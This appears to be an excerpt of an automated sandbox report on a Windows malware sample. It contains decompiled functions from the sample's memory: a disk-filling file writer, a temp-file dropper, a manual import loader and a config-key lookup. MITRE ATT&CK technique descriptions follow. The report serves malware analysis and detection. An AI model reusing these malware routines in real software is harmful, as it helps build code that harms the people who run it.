Opcode Fuzzy Hash: 31ad5a6bbd0f38766327acec72db81d4e7f540d6d431a429b70071babb52397f
Instruction Fuzzy Hash: A951B171A0062AFFDB178F68EE91BAAFBA9AF04344F164055E941AB251D730ED41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00326A60, Relevance: 13.6, APIs: 9, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00326A60(int __edx, CHAR* _a4, intOrPtr _a8, int _a12) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				void* _v12;
				long _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				void* _t31;
				intOrPtr _t43;
				int _t44;
				void* _t53;
				int _t59;
				CHAR* _t68;
				void* _t69;
				int _t73;

				_t59 = __edx;
				_t68 = _a4;
				_t31 = CreateFileA(_t68, 0x40000000, 0, 0, 2, 0x80, 0);
				_v12 = _t31;
				if(_t31 == 0xffffffff) {
					 *0x332180 = 0x61080101;
					 *0x33217c = GetLastError();
					__eflags = 0;
					return 0;
				}
				_v8 =  *_t68;
				_v7 = _t68[1];
				_t63 = _a12;
				_v6 = _t68[2];
				_v5 = 0;
				if(GetDiskFreeSpaceA( &_v8,  &_v20,  &_v24,  &_v16,  &_v32) == 0) {
					L10:
					_t43 = E00326987(0x500000, _v12, _a8, _a12, _t63);
					_v28 = _t43;
					if(_t43 != 0) {
						_t44 = CloseHandle(_v12);
						__eflags = _t44;
						if(_t44 != 0) {
							L15:
							return _v28;
						}
						 *0x332180 = 0x61080103;
						 *0x33217c = GetLastError();
						CloseHandle(_v12);
						L14:
						DeleteFileA(_t68);
						goto L15;
					}
					 *0x332180 = 0x61080102;
					 *0x33217c = GetLastError();
					CloseHandle(_v12);
					goto L14;
				}
				_t53 = E0032EB0E(_v20 * _v24, 0, _v16, 0);
				_t69 = _t69 + 0x10;
				_t73 = _t59;
				if(_t73 < 0) {
					goto L10;
				}
				if(_t73 > 0 || _t53 > 0x6400000) {
					_t22 = E0032ECA5() % 0x500000 + 0xa00000; // 0xa00000
					_t63 = _t22;
					goto L10;
				} else {
					__eflags = _t59;
					if(__eflags < 0) {
						goto L10;
					}
					if(__eflags > 0) {
						L9:
						_t63 = (E0032ECA5() & 0x001fffff) + 0x300000;
						__eflags = (E0032ECA5() & 0x001fffff) + 0x300000;
						goto L10;
					}
					__eflags = _t53 - 0x3200000;
					if(_t53 <= 0x3200000) {
						goto L10;
					}
					goto L9;
				}
			}

0x00326a60
0x00326a68
0x00326a7d
0x00326a83
0x00326a89
0x00326b8c
0x00326b9c
0x00326ba1
0x00000000
0x00326ba1
0x00326a91
0x00326a97
0x00326a9e
0x00326aa1
0x00326ab8
0x00326ac3
0x00326b1d
0x00326b27
0x00326b2f
0x00326b34
0x00326b5f
0x00326b61
0x00326b63
0x00326b86
0x00000000
0x00326b89
0x00326b65
0x00326b78
0x00326b7d
0x00326b7f
0x00326b80
0x00000000
0x00326b80
0x00326b36
0x00326b49
0x00326b4e
0x00000000
0x00326b4e
0x00326ad2
0x00326ad7
0x00326ada
0x00326adc
0x00000000
0x00000000
0x00326ade
0x00326af5
0x00326af5
0x00000000
0x00326afd
0x00326afd
0x00326aff
0x00000000
0x00000000
0x00326b01
0x00326b0a
0x00326b17
0x00326b17
0x00000000
0x00326b17
0x00326b03
0x00326b08
0x00000000
0x00000000
0x00000000
0x00326b08

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,73BB81D0,?,?,?,?,00329A60,?,?,00329E9D), ref: 00326A7D
GetDiskFreeSpaceA.KERNEL32(00329E9D,00329A60,?,?,?,003322F8,?,?,?,00329A60,?,?,00329E9D), ref: 00326ABB
GetLastError.KERNEL32(?,?,?,?,?,?,?,00329A60,?,?,00329E9D), ref: 00326B40
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00329A60,?,?,00329E9D), ref: 00326B4E
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00329A60,?,?,00329E9D), ref: 00326B5F
GetLastError.KERNEL32(?,?,?,?,?,?,?,00329A60,?,?,00329E9D), ref: 00326B6F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00329A60,?,?,00329E9D), ref: 00326B7D
DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00329A60,?,?,00329E9D), ref: 00326B80
GetLastError.KERNEL32(?,?,?,00329A60,?,?,00329E9D,?,?,?,?,?,00329E9D,?,00000022,?), ref: 00326B96

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast$File$CreateDeleteDiskFreeSpace
String ID:
API String ID: 3188212458-0
Opcode ID: 4b2c0a3f702ec9237ac5f15e6e83197a4a99d63c1e2c634f001ca0c2066a4957
Instruction ID: 645b32eb4a45272bebd1020cfcfe6ce00409378bbdd48f6df09f972d1d5a7838
Opcode Fuzzy Hash: 4b2c0a3f702ec9237ac5f15e6e83197a4a99d63c1e2c634f001ca0c2066a4957
Instruction Fuzzy Hash: 4F31CDB2D04219AFDF079FA4AD86BDFBB7DEF48310F148066E652E7251E73099448B60

Uniqueness

Uniqueness Score: -1.00%

Function 00329064, Relevance: 9.1, APIs: 6, Instructions: 83
filestringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00329064(void* __eflags, void* _a4, CHAR* _a8) {
				long _v8;
				char _v1032;
				signed int _t29;
				signed int _t62;
				void* _t64;

				GetTempPathA(0x400,  &_v1032);
				E00328274( &_v1032);
				_t29 = E0032ECA5();
				_t62 = 9;
				_push(_t29 % _t62);
				_push(E0032ECA5() % _t62);
				_push(E0032ECA5() % _t62);
				_push(E0032ECA5() % _t62);
				_push( &_v1032);
				wsprintfA(_a8, E00322544(0x3322f8,  &E00330794, 0xf, 0xe4, 0xc8));
				E0032EE2A(_t62, 0x3322f8, 0, 0x100);
				_t64 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);
				if(_t64 <= 0) {
					return 0;
				}
				WriteFile(_t64, _a4, lstrlenA(_a4),  &_v8, 0);
				CloseHandle(_t64);
				return 1;
			}

0x0032907b
0x00329088
0x0032908e
0x00329095
0x0032909c
0x003290a8
0x003290b4
0x003290c9
0x003290ca
0x003290e9
0x003290f8
0x00329114
0x00329118
0x00000000
0x0032913f
0x0032912d
0x00329134
0x00000000

APIs

GetTempPathA.KERNEL32(00000400,?,00000000,003322F8), ref: 0032907B
wsprintfA.USER32 ref: 003290E9
CreateFileA.KERNEL32(003322F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0032910E
lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00329122
WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0032912D
CloseHandle.KERNEL32(00000000), ref: 00329134

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
String ID:
API String ID: 2439722600-0
Opcode ID: 9a3c7b86933e7618abcb08f3a9dcd2d7a30453eb3a549ebc3c3823dc90ad0af2
Instruction ID: 1ceba3c33cfebd27b139a868501d3c2b09a676d257548b4938c4589692bee208
Opcode Fuzzy Hash: 9a3c7b86933e7618abcb08f3a9dcd2d7a30453eb3a549ebc3c3823dc90ad0af2
Instruction Fuzzy Hash: 3E1196B6A401247BF72A6B72EC4AFAF767DDBC5B00F008065FB0AE5191EA705A119660

Uniqueness

Uniqueness Score: -1.00%

Function 00326069, Relevance: 7.6, APIs: 5, Instructions: 121
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00326069(_Unknown_base(*)()* _a4) {
				intOrPtr* _v8;
				signed int _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _t47;
				_Unknown_base(*)()* _t48;
				_Unknown_base(*)()* _t50;
				struct HINSTANCE__* _t52;
				_Unknown_base(*)()* _t53;
				_Unknown_base(*)()* _t54;
				_Unknown_base(*)()* _t55;
				signed int _t56;
				_Unknown_base(*)()* _t59;
				_Unknown_base(*)()* _t62;
				_Unknown_base(*)()* _t63;
				intOrPtr _t69;
				_Unknown_base(*)()* _t76;
				_Unknown_base(*)()* _t77;
				intOrPtr* _t82;
				void* _t85;
				intOrPtr* _t87;
				_Unknown_base(*)()* _t89;

				_t82 = _a4;
				_t47 =  *_t82;
				_t3 = _t82 + 4; // 0x65e85621
				_t69 =  *_t3;
				_v12 = 1;
				if( *((intOrPtr*)(_t47 + 0x84)) != 0) {
					_t85 =  *((intOrPtr*)(_t47 + 0x80)) + _t69;
					_t48 = IsBadReadPtr(_t85, 0x14);
					__eflags = _t48;
					if(_t48 != 0) {
						L29:
						return _v12;
					}
					_t87 = _t85 + 0x10;
					_v8 = _t87;
					while(1) {
						_t50 =  *(_t87 - 4);
						__eflags = _t50;
						if(_t50 == 0) {
							goto L29;
						}
						_t52 = LoadLibraryA(_t50 + _t69);
						_v16 = _t52;
						__eflags = _t52 - 0xffffffff;
						if(_t52 == 0xffffffff) {
							L28:
							_t44 =  &_v12;
							 *_t44 = _v12 & 0x00000000;
							__eflags =  *_t44;
							goto L29;
						}
						_t10 = _t82 + 8; // 0x8bfffffa
						_t53 =  *_t10;
						__eflags = _t53;
						if(_t53 != 0) {
							_t14 = _t82 + 0xc; // 0x28408b06
							_t54 = E0032EBED(_t53, 4 +  *_t14 * 4);
						} else {
							_t11 = _t82 + 0xc; // 0x28408b06
							_t54 = E0032EBCC(4 +  *_t11 * 4);
						}
						 *(_t82 + 8) = _t54;
						__eflags = _t54;
						if(_t54 == 0) {
							goto L28;
						} else {
							_t18 = _t82 + 0xc; // 0x28408b06
							 *((intOrPtr*)(_t54 +  *_t18 * 4)) = _v16;
							 *(_t82 + 0xc) =  *(_t82 + 0xc) + 1;
							_t55 =  *(_t87 - 0x10);
							__eflags = _t55;
							if(_t55 == 0) {
								_t89 =  *_t87 + _t69;
								__eflags = _t89;
								_t76 = _t89;
							} else {
								_t89 = _t55 + _t69;
								_t76 =  *_v8 + _t69;
							}
							_t56 =  *_t89;
							__eflags = _t56;
							if(_t56 == 0) {
								L25:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L29;
								}
								_v8 = _v8 + 0x14;
								_t59 = IsBadReadPtr(_v8 + 0xfffffff0, 0x14);
								__eflags = _t59;
								if(_t59 == 0) {
									_t87 = _v8;
									continue;
								}
								goto L29;
							} else {
								_a4 = _t76;
								_a4 = _a4 - _t89;
								__eflags = _t56;
								do {
									if(__eflags >= 0) {
										_t62 = GetProcAddress(_v16, _t56 + _t69 + 2);
										__eflags = _t62;
										if(_t62 == 0) {
											L21:
											_t63 = _a4;
											__eflags =  *(_t63 + _t89);
											if( *(_t63 + _t89) == 0) {
												_t38 =  &_v12;
												 *_t38 = _v12 & 0x00000000;
												__eflags =  *_t38;
												goto L25;
											}
											goto L22;
										}
										_t77 = _a4;
										__eflags = _t62 -  *(_t77 + _t89);
										if(_t62 ==  *(_t77 + _t89)) {
											goto L21;
										}
										L20:
										 *(_t77 + _t89) = _t62;
										goto L21;
									}
									_t62 = GetProcAddress(_v16, _t56 & 0x0000ffff);
									_t77 = _a4;
									goto L20;
									L22:
									_t89 = _t89 + 4;
									_t56 =  *_t89;
									__eflags = _t56;
								} while (__eflags != 0);
								goto L25;
							}
						}
					}
					goto L29;
				}
				return 1;
			}

0x00326071
0x00326074
0x0032607c
0x0032607c
0x00326082
0x00326087
0x00326099
0x0032609c
0x003260a2
0x003260a4
0x003261b2
0x00000000
0x003261b5
0x003260aa
0x003260ad
0x003260b5
0x003260b5
0x003260b8
0x003260ba
0x00000000
0x00000000
0x003260c3
0x003260c9
0x003260cc
0x003260cf
0x003261ae
0x003261ae
0x003261ae
0x003261ae
0x00000000
0x003261ae
0x003260d5
0x003260d5
0x003260d8
0x003260da
0x003260ee
0x003260fa
0x003260dc
0x003260dc
0x003260e7
0x003260e7
0x00326101
0x00326104
0x00326106
0x00000000
0x0032610c
0x0032610c
0x00326112
0x00326115
0x00326118
0x0032611b
0x0032611d
0x0032612d
0x0032612d
0x0032612f
0x0032611f
0x0032611f
0x00326127
0x00326127
0x00326131
0x00326133
0x00326135
0x0032618b
0x0032618b
0x0032618f
0x00000000
0x00000000
0x00326191
0x0032619e
0x003261a4
0x003261a6
0x003260b2
0x00000000
0x003260b2
0x00000000
0x00326137
0x00326137
0x0032613a
0x0032613d
0x0032613f
0x0032613f
0x0032615e
0x00326164
0x00326166
0x00326173
0x00326173
0x00326176
0x0032617a
0x00326187
0x00326187
0x00326187
0x00000000
0x00326187
0x00000000
0x0032617a
0x00326168
0x0032616b
0x0032616e
0x00000000
0x00000000
0x00326170
0x00326170
0x00000000
0x00326170
0x0032614a
0x00326150
0x00000000
0x0032617c
0x0032617c
0x0032617f
0x00326181
0x00326181
0x00000000
0x00326185
0x00326135
0x00326106
0x00000000
0x003260b5
0x00000000

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?,003264CF,00000000), ref: 0032609C
LoadLibraryA.KERNEL32(?,?,003264CF,00000000), ref: 003260C3
GetProcAddress.KERNEL32(?,00000014), ref: 0032614A
IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 0032619E

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: Read$AddressLibraryLoadProc
String ID:
API String ID: 2438460464-0
Opcode ID: c7fad38f45ab978aea5bb51234f1a94bdcdf0a076efb281eb84b6c24a092509b
Instruction ID: cf798ec136f9d46b7405b73a0af9ea625b87348796e168af44dc7624a03e94d5
Opcode Fuzzy Hash: c7fad38f45ab978aea5bb51234f1a94bdcdf0a076efb281eb84b6c24a092509b
Instruction Fuzzy Hash: 9D418C71A00225EFDB16CF68E896B69B7B9EF14354F258068E815D7291E730FD60DB80

Uniqueness

Uniqueness Score: -1.00%

Function 00322419, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00322419(void* __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12) {
				int _v8;
				int _t18;
				intOrPtr _t20;
				CHAR* _t21;
				int _t30;
				CHAR* _t36;

				_t18 = lstrlenA(_a12);
				_t36 = _a4;
				_v8 = _t18;
				_t20 = _a8 + _t36;
				_a8 = _t20;
				if(_t36 >= _t20) {
					L5:
					_t21 = 0;
				} else {
					while(1) {
						_t30 = lstrlenA(_t36);
						_t7 =  &(_t36[1]); // 0x1
						_a4 = _t30 + _t7;
						if(_v8 == _t30 && lstrcmpiA(_t36, _a12) == 0 && _a4 < _a8) {
							break;
						}
						_t36 =  &(_t36[lstrlenA(_a4) + _t30 + 2]);
						if(_t36 < _a8) {
							continue;
						} else {
							goto L5;
						}
						goto L6;
					}
					_t21 = _a4;
				}
				L6:
				return _t21;
			}

0x00322429
0x0032242b
0x0032242e
0x00322434
0x00322436
0x0032243b
0x00322474
0x00322474
0x0032243d
0x0032243d
0x00322440
0x00322442
0x00322446
0x0032244c
0x00000000
0x00000000
0x0032246b
0x00322472
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00322472
0x0032247b
0x0032247b
0x00322476
0x0032247a

APIs

lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00322491,?,?,?,0032E844,-00000030,?,?,?,00000001), ref: 00322429
lstrlenA.KERNEL32(?,?,00322491,?,?,?,0032E844,-00000030,?,?,?,00000001,00321E3D,00000001,localcfg,lid_file_upd), ref: 0032243E
lstrcmpiA.KERNEL32(?,?,?,00322491,?,?,?,0032E844,-00000030,?,?,?,00000001,00321E3D,00000001,localcfg), ref: 00322452
lstrlenA.KERNEL32(?,?,00322491,?,?,?,0032E844,-00000030,?,?,?,00000001,00321E3D,00000001,localcfg,lid_file_upd), ref: 00322467

Strings

localcfg, xrefs: 0032241F

Memory Dump Source

Source File: 00000027.00000002.922686278.0000000000320000.00000040.00000001.sdmp, Offset: 00320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_39_2_320000_svchost.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcmpi
String ID: localcfg
API String ID: 1808961391-1857712256
Opcode ID: db7a51f50d71424f18b12b1f8444e3c8870f707afaaccd7ced1cf4b792f5a46a
Instruction ID: 29a6592fe9b15a07f330d11714acfc4ad601a6f751302ff1f4df3e132dd190e2
Opcode Fuzzy Hash: db7a51f50d71424f18b12b1f8444e3c8870f707afaaccd7ced1cf4b792f5a46a
Instruction Fuzzy Hash: 3301DA31600228BF8F16EF6ADC849DE7BA9EF44354B51C425F959A7211E330EA448A90

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report U3E7zMaux2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Bitcoin Miner:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

